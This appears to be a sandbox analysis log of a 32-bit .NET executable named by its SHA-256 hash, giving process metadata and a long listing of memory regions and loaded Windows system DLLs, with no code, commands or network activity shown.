Process:
id = "4"
image_name = "fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe"
filename = "c:\\users\\keecfmwgj\\desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe"
page_root = "0x3b954000"
os_pid = "0x830"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "1"
os_parent_pid = "0xf60"
cmd_line = "\"C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe\""
cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f52a" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1661
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1662
start_va = 0x30000
end_va = 0x31fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 1663
start_va = 0x40000
end_va = 0x40fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1664
start_va = 0x50000
end_va = 0x53fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 1665
start_va = 0x60000
end_va = 0x60fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000060000"
filename = ""
Region:
id = 1666
start_va = 0x100000
end_va = 0x13ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000100000"
filename = ""
Region:
id = 1667
start_va = 0x190000
end_va = 0x28ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000190000"
filename = ""
Region:
id = 1668
start_va = 0x1370000
end_va = 0x1439fff
monitored = 1
entry_point = 0x1434c4e
region_type = mapped_file
name = "fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe"
filename = "\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe")
Region:
id = 1669
start_va = 0x76d20000
end_va = 0x76ec8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1670
start_va = 0x76f00000
end_va = 0x7707ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 1671
start_va = 0x7efb0000
end_va = 0x7efd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efb0000"
filename = ""
Region:
id = 1672
start_va = 0x7efdb000
end_va = 0x7efddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdb000"
filename = ""
Region:
id = 1673
start_va = 0x7efde000
end_va = 0x7efdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efde000"
filename = ""
Region:
id = 1674
start_va = 0x7efdf000
end_va = 0x7efdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdf000"
filename = ""
Region:
id = 1675
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 1676
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1677
start_va = 0x7fff0000
end_va = 0x7fffffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 1678
start_va = 0x400000
end_va = 0x437fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 1679
start_va = 0x440000
end_va = 0x5bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000440000"
filename = ""
Region:
id = 1680
start_va = 0x73690000
end_va = 0x736cefff
monitored = 0
entry_point = 0x736be088
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 1681
start_va = 0x73630000
end_va = 0x7368bfff
monitored = 0
entry_point = 0x7366f9f4
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 1682
start_va = 0x73620000
end_va = 0x73627fff
monitored = 0
entry_point = 0x736220f8
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 1683
start_va = 0x76b00000
end_va = 0x76c1efff
monitored = 0
entry_point = 0x76b15340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1684
start_va = 0x752b0000
end_va = 0x753bffff
monitored = 0
entry_point = 0x752c3283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 1685
start_va = 0x76b00000
end_va = 0x76c1efff
monitored = 0
entry_point = 0x76b15340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1686
start_va = 0x76b00000
end_va = 0x76c1efff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000076b00000"
filename = ""
Region:
id = 1687
start_va = 0x76c20000
end_va = 0x76d19fff
monitored = 0
entry_point = 0x76c3a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1688
start_va = 0x76c20000
end_va = 0x76d19fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000076c20000"
filename = ""
Region:
id = 1689
start_va = 0x5c0000
end_va = 0x7bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005c0000"
filename = ""
Region:
id = 1690
start_va = 0x73500000
end_va = 0x73549fff
monitored = 1
entry_point = 0x73502e54
region_type = mapped_file
name = "mscoree.dll"
filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll")
Region:
id = 1691
start_va = 0x752b0000
end_va = 0x753bffff
monitored = 0
entry_point = 0x752c3283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 1692
start_va = 0x753c0000
end_va = 0x75406fff
monitored = 0
entry_point = 0x753c74c1
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 1693
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1694
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1695
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1696
start_va = 0x70000
end_va = 0xd6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1697
start_va = 0x290000
end_va = 0x3bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000290000"
filename = ""
Region:
id = 1698
start_va = 0x7c0000
end_va = 0x92ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007c0000"
filename = ""
Region:
id = 1699
start_va = 0x76a60000
end_va = 0x76afffff
monitored = 0
entry_point = 0x76a749e5
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")
Region:
id = 1700
start_va = 0x75410000
end_va = 0x754bbfff
monitored = 0
entry_point = 0x7541a472
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 1701
start_va = 0x759a0000
end_va = 0x759b8fff
monitored = 0
entry_point = 0x759a4975
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 1702
start_va = 0x76970000
end_va = 0x76a5ffff
monitored = 0
entry_point = 0x76980569
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 1703
start_va = 0x74a50000
end_va = 0x74aaffff
monitored = 0
entry_point = 0x74a6a3b3
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 1704
start_va = 0x74a40000
end_va = 0x74a4bfff
monitored = 0
entry_point = 0x74a410e1
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 1705
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 1706
start_va = 0x733b0000
end_va = 0x7343cfff
monitored = 1
entry_point = 0x733c2860
region_type = mapped_file
name = "mscoreei.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")
Region:
id = 1708
start_va = 0x734f0000
end_va = 0x734f2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-synch-l1-2-0.dll"
filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll")
Region:
id = 1712
start_va = 0x751c0000
end_va = 0x75216fff
monitored = 0
entry_point = 0x751d9ba6
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")
Region:
id = 1713
start_va = 0x75220000
end_va = 0x752affff
monitored = 0
entry_point = 0x75236343
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")
Region:
id = 1714
start_va = 0x76860000
end_va = 0x7695ffff
monitored = 0
entry_point = 0x7687b6ed
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")
Region:
id = 1715
start_va = 0x759c0000
end_va = 0x759c9fff
monitored = 0
entry_point = 0x759c36a0
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll")
Region:
id = 1716
start_va = 0x74d40000
end_va = 0x74ddcfff
monitored = 0
entry_point = 0x74d73fd7
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll")
Region:
id = 1717
start_va = 0xe0000
end_va = 0xfdfff
monitored = 0
entry_point = 0xf158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1718
start_va = 0x930000
end_va = 0xab7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000930000"
filename = ""
Region:
id = 1719
start_va = 0xe0000
end_va = 0xfdfff
monitored = 0
entry_point = 0xf158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1720
start_va = 0x75550000
end_va = 0x755affff
monitored = 0
entry_point = 0x7556158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1721
start_va = 0x74c40000
end_va = 0x74d0bfff
monitored = 0
entry_point = 0x74c4168b
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll")
Region:
id = 1722
start_va = 0xac0000
end_va = 0xc40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000ac0000"
filename = ""
Region:
id = 1723
start_va = 0x1440000
end_va = 0x283ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001440000"
filename = ""
Region:
id = 1724
start_va = 0x30000
end_va = 0x30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 1725
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 1726
start_va = 0x290000
end_va = 0x353fff
monitored = 1
entry_point = 0x354c4e
region_type = mapped_file
name = "fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe"
filename = "\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe")
Region:
id = 1727
start_va = 0x3b0000
end_va = 0x3bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003b0000"
filename = ""
Region:
id = 1728
start_va = 0x290000
end_va = 0x353fff
monitored = 1
entry_point = 0x354c4e
region_type = mapped_file
name = "fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe"
filename = "\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe")
Region:
id = 1729
start_va = 0x733a0000
end_va = 0x733a8fff
monitored = 0
entry_point = 0x733a1220
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll")
Region:
id = 1730
start_va = 0x71770000
end_va = 0x71f1efff
monitored = 1
entry_point = 0x7178d0d0
region_type = mapped_file
name = "clr.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")
Region:
id = 1731
start_va = 0x71770000
end_va = 0x71f1efff
monitored = 1
entry_point = 0x7178d0d0
region_type = mapped_file
name = "clr.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")
Region:
id = 1732
start_va = 0x71770000
end_va = 0x71f1efff
monitored = 1
entry_point = 0x7178d0d0
region_type = mapped_file
name = "clr.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")
Region:
id = 1733
start_va = 0x73600000
end_va = 0x73613fff
monitored = 0
entry_point = 0x7360ac00
region_type = mapped_file
name = "vcruntime140_clr0400.dll"
filename = "\\Windows\\SysWOW64\\vcruntime140_clr0400.dll" (normalized: "c:\\windows\\syswow64\\vcruntime140_clr0400.dll")
Region:
id = 1734
start_va = 0x73550000
end_va = 0x735fafff
monitored = 0
entry_point = 0x735e5f20
region_type = mapped_file
name = "ucrtbase_clr0400.dll"
filename = "\\Windows\\SysWOW64\\ucrtbase_clr0400.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase_clr0400.dll")
Region:
id = 1736
start_va = 0xf0000
end_va = 0xf0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000f0000"
filename = ""
Region:
id = 1737
start_va = 0x140000
end_va = 0x14ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000140000"
filename = ""
Region:
id = 1738
start_va = 0x150000
end_va = 0x15ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 1739
start_va = 0x160000
end_va = 0x16ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 1740
start_va = 0x170000
end_va = 0x17ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 1741
start_va = 0x180000
end_va = 0x18ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000180000"
filename = ""
Region:
id = 1742
start_va = 0x290000
end_va = 0x29ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000290000"
filename = ""
Region:
id = 1743
start_va = 0x2a0000
end_va = 0x2a0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002a0000"
filename = ""
Region:
id = 1744
start_va = 0x2b0000
end_va = 0x2b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002b0000"
filename = ""
Region:
id = 1745
start_va = 0xc50000
end_va = 0xe6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000c50000"
filename = ""
Region:
id = 1746
start_va = 0xe70000
end_va = 0x108ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e70000"
filename = ""
Region:
id = 1747
start_va = 0x4a0000
end_va = 0x4dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004a0000"
filename = ""
Region:
id = 1748
start_va = 0x540000
end_va = 0x5bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000540000"
filename = ""
Region:
id = 1749
start_va = 0xd30000
end_va = 0xe2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000d30000"
filename = ""
Region:
id = 1750
start_va = 0xe30000
end_va = 0xe6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 1751
start_va = 0x7efd8000
end_va = 0x7efdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efd8000"
filename = ""
Region:
id = 1752
start_va = 0x2c0000
end_va = 0x2cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002c0000"
filename = ""
Region:
id = 1753
start_va = 0x2840000
end_va = 0x483ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002840000"
filename = ""
Region:
id = 1754
start_va = 0x2c0000
end_va = 0x35ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002c0000"
filename = ""
Region:
id = 1755
start_va = 0x620000
end_va = 0x65ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000620000"
filename = ""
Region:
id = 1756
start_va = 0x6c0000
end_va = 0x7bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000006c0000"
filename = ""
Region:
id = 1757
start_va = 0xf40000
end_va = 0x103ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f40000"
filename = ""
Region:
id = 1758
start_va = 0x1050000
end_va = 0x108ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001050000"
filename = ""
Region:
id = 1759
start_va = 0x7efd5000
end_va = 0x7efd7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efd5000"
filename = ""
Region:
id = 1760
start_va = 0x5e0000
end_va = 0x61ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005e0000"
filename = ""
Region:
id = 1761
start_va = 0x1220000
end_va = 0x131ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001220000"
filename = ""
Region:
id = 1762
start_va = 0x7efad000
end_va = 0x7efaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efad000"
filename = ""
Region:
id = 1772
start_va = 0x4840000
end_va = 0x4b0efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1773
start_va = 0x70360000
end_va = 0x7176afff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "mscorlib.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll")
Region:
id = 1774
start_va = 0x75740000
end_va = 0x7589bfff
monitored = 0
entry_point = 0x7578ba3d
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 1775
start_va = 0x73a10000
end_va = 0x73a8ffff
monitored = 0
entry_point = 0x73a237c9
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")
Region:
id = 1776
start_va = 0x4b10000
end_va = 0x4cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004b10000"
filename = ""
Region:
id = 1777
start_va = 0x7c0000
end_va = 0x89efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007c0000"
filename = ""
Region:
id = 1778
start_va = 0x8f0000
end_va = 0x92ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008f0000"
filename = ""
Region:
id = 1779
start_va = 0x360000
end_va = 0x36ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000360000"
filename = ""
Region:
id = 1780
start_va = 0x6f900000
end_va = 0x70354fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\2c3c912ea8f058f9d04c4650128feb3f\\system.ni.dll")
Region:
id = 1781
start_va = 0x6f5a0000
end_va = 0x6f742fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.drawing.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\system.drawing.ni.dll")
Region:
id = 1782
start_va = 0x6d250000
end_va = 0x6e0b5fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.windows.forms.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\system.windows.forms.ni.dll")
Region:
id = 1783
start_va = 0x370000
end_va = 0x37ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000370000"
filename = ""
Region:
id = 1784
start_va = 0x74a10000
end_va = 0x74a12fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-xstate-l2-1-0.dll"
filename = "\\Windows\\SysWOW64\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-xstate-l2-1-0.dll")
Region:
id = 1785
start_va = 0x74980000
end_va = 0x74a08fff
monitored = 1
entry_point = 0x74981130
region_type = mapped_file
name = "clrjit.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")
Region:
id = 1786
start_va = 0x75130000
end_va = 0x751befff
monitored = 0
entry_point = 0x75133fb1
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 1787
start_va = 0x380000
end_va = 0x38ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000380000"
filename = ""
Region:
id = 1788
start_va = 0x390000
end_va = 0x39ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000390000"
filename = ""
Region:
id = 1789
start_va = 0x6e0c0000
end_va = 0x6e8d7fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.core.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\31fae3290fad30c31c98651462d22724\\system.core.ni.dll")
Region:
id = 1790
start_va = 0x6f3b0000
end_va = 0x6f591fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "microsoft.visualbasic.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.V9921e851#\\a891970b44db9e340c3ef3efa95b793c\\Microsoft.VisualBasic.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.v9921e851#\\a891970b44db9e340c3ef3efa95b793c\\microsoft.visualbasic.ni.dll")
Region:
id = 1791
start_va = 0x390000
end_va = 0x39ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000390000"
filename = ""
Region:
id = 1792
start_va = 0x390000
end_va = 0x39ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000390000"
filename = ""
Region:
id = 1793
start_va = 0x7ef50000
end_va = 0x7ef9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef50000"
filename = ""
Region:
id = 1794
start_va = 0x7ef40000
end_va = 0x7ef4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef40000"
filename = ""
Region:
id = 1795
start_va = 0x74960000
end_va = 0x74972fff
monitored = 1
entry_point = 0x7496d900
region_type = mapped_file
name = "nlssorting.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\nlssorting.dll")
Region:
id = 1796
start_va = 0x4d00000
end_va = 0x4fd1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nlp"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\sortdefault.nlp" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\sortdefault.nlp")
Region:
id = 1797
start_va = 0x390000
end_va = 0x39ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000390000"
filename = ""
Region:
id = 1798
start_va = 0x6f7f0000
end_va = 0x6f8f4fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.configuration.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\96f7edb07b12303f0ec2595c7f3778c7\\system.configuration.ni.dll")
Region:
id = 1800
start_va = 0x6ec30000
end_va = 0x6f3a3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.xml.ni.dll"
